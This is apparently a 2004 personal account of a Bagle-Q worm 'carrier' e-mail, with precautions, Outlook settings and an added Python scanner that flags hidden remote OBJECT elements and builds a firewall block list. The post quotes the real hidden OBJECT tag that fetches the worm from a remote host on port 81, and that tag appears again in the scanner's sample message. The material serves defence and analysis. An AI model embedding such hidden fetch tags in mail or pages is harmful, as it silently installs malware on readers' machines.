This afternoon I received this suspected virus-borne e-mail that escaped detection by my AV system (AVG DB402).
Received: from william.com ([203.125.76.253]) - http://www.pagenation.com/sc/203.125.76.253, a Singapore broadband subscriber.
From: wn @ metatech .com.hk
Sent: 18 March, 2004 02:00 PM
Subject: RE: Text message
It looks like an ordinary message, but the body hides the following script:
< OBJECT style="DISPLAY: none" data=http://211.181.1.68:81/536473.php >< /OBJECT >
Luckily, I had disabled the running of scripts in my Outlook software (see tips below), and instead got the message "Your current security settings prohibit running of ActiveX control on this page".
On further investigation, I found that this is indeed another new method of spreading the virus (W32/Bagle-Q).
According to Sophos:
It spreads via a "carrier" email that does not contain the virus as an attachment. When you open a "carrier" email, it attempts to exploit a vulnerability in Outlook that automatically downloads W32/Bagle-Q from the PC that sent you the "carrier" email.
Using the IP lookup web tool (www.pagenation.com/sc/211.181.1.68), I found that this infected machine is located in Korea. I also did a ping test and found that the machine responded. I was lucky this time: if I had not disabled the running of scripts, this virus would have taken over my machine. Thank God!
The "carrier" email downloads W32/Bagle-Q via an HTTP (web) request to TCP port 81 on the sender's PC. The downloaded copy of W32/Bagle-Q is placed into your system folder with the name directs.exe. W32/Bagle-Q then loads on your PC and terminates a wide range of security applications. It also makes multiple copies of itself into folders that are likely to be part of a file-sharing network, as well as infecting programs on your PC by appending itself to existing EXE files (this is called "parasitic virus infection").
Here are some precautions against W32/Bagle-Q:
- Get and apply the latest Internet Explorer/Outlook Express patches from Microsoft. This prevents the automatic download of the virus.
- Disallow connections to TCP port 81 through your network firewall. Blocking outbound port 81 connections stops computers on your network from downloading the worm from outside. Blocking inbound port 81 connections means that even if you do get infected, you will not pass the virus on to others.
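The tell-tale sign of this "carrier" message is the hidden OBJECT element that fetches content from a remote host on a non-standard port. The following Python script, an added example and not part of the original post or of any vendor tool, scans an e-mail's HTML parts for that pattern and emits the host/port pairs to block at the firewall. The sample messages are constructed for the example: the Subject line and the OBJECT element are the ones quoted above, while the From/To addresses and the benign message are placeholders.

```python
"""Scan an e-mail for Bagle-style "carrier" content: a hidden OBJECT (or EMBED/IFRAME)
whose data/src attribute points at a remote host, typically on a non-standard port such as 81."""
import email
import re
from email.policy import default
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the carrier message quoted in the post.
# Only the Subject and the OBJECT element are taken from the post; the addresses are placeholders.
CARRIER_MESSAGE = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: RE: Text message
Content-Type: text/html; charset=us-ascii

<html><body>
<p>Please read the text message below.</p>
<OBJECT style="DISPLAY: none" data=http://211.181.1.68:81/536473.php></OBJECT>
</body></html>
"""

# Constructed benign message: a visible image on port 80 should not be flagged.
BENIGN_MESSAGE = """\
From: colleague@example.invalid
To: victim@example.invalid
Subject: Lunch
Content-Type: text/html; charset=us-ascii

<html><body><p>Lunch at 1 pm? <img src="http://example.invalid/logo.png"></p></body></html>
"""

HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
SUSPECT_TAGS = ("object", "embed", "iframe")


class _ElementCollector(HTMLParser):
    """Collect the attributes of every OBJECT/EMBED/IFRAME start tag."""

    def __init__(self):
        super().__init__()
        self.elements = []

    def handle_starttag(self, tag, attrs):
        if tag in SUSPECT_TAGS:  # html.parser lower-cases tag names for us
            self.elements.append({k.lower(): (v or "") for k, v in attrs})


def find_carrier_elements(html):
    """Return findings for elements that load remote content while hidden or via a non-standard port."""
    collector = _ElementCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.elements:
        url = attrs.get("data") or attrs.get("src") or ""
        parsed = urlparse(url)
        if parsed.scheme not in ("http", "https") or not parsed.hostname:
            continue  # local or malformed reference: nothing is fetched from the network
        port = parsed.port or (443 if parsed.scheme == "https" else 80)
        hidden = bool(HIDDEN_RE.search(attrs.get("style", "")))
        nonstandard_port = port not in (80, 443)
        if hidden or nonstandard_port:
            findings.append({"url": url, "host": parsed.hostname, "port": port,
                             "hidden": hidden, "nonstandard_port": nonstandard_port})
    return findings


def scan_message(raw):
    """Parse an RFC 822 message and scan every text/html part it contains."""
    msg = email.message_from_string(raw, policy=default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(find_carrier_elements(part.get_content()))
    return findings


def block_list(findings):
    """Sorted, de-duplicated (host, port) pairs to feed into an egress firewall rule."""
    return sorted({(f["host"], f["port"]) for f in findings})


if __name__ == "__main__":
    for label, raw in (("carrier", CARRIER_MESSAGE), ("benign", BENIGN_MESSAGE)):
        hits = scan_message(raw)
        print(f"{label}: {len(hits)} suspicious element(s)")
        for f in hits:
            print(f"  {f['host']}:{f['port']} hidden={f['hidden']} nonstandard_port={f['nonstandard_port']}")
    print("block:", block_list(scan_message(CARRIER_MESSAGE)))
```

Run against the carrier sample it reports one hidden element fetching from 211.181.1.68 on port 81, which is exactly the pair the port-81 firewall precaution above is meant to stop; the benign sample produces nothing. Flagging "hidden or non-standard port" rather than requiring both keeps the check useful when a later variant drops one of the two tricks.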
Tips for Setting Outlook:
Tools > Options
- Security Tab
- Download Pictures [ Change Automatic Download Settings ... ]
- Check ON...
- Don’t download pictures or other content automatically in HTML e-mail
- Warn me before downloading content when editing, forwarding, or replying to e-mail
Another virus-infected mail came in. This time the zombie is located at http://pagenation.com/sc/24.224.236.131 (Canada). Interestingly, the sender is spoofed to our local domain (postbox at mac-net dot com). The sending IP is http://pagenation.com/sc/203.125.64.148, Singapore (bb- 203- 125- 64- 148. singnet.com.sg, a local broadband subscriber), but the sender domain is titled com-o6vepdwwbxu.net.
I am getting really angry with all these virus writers. I hope the long arm of the law catches them and punishes them severely.
Singapore, 22 March 2004.
Updated On: 12.07.11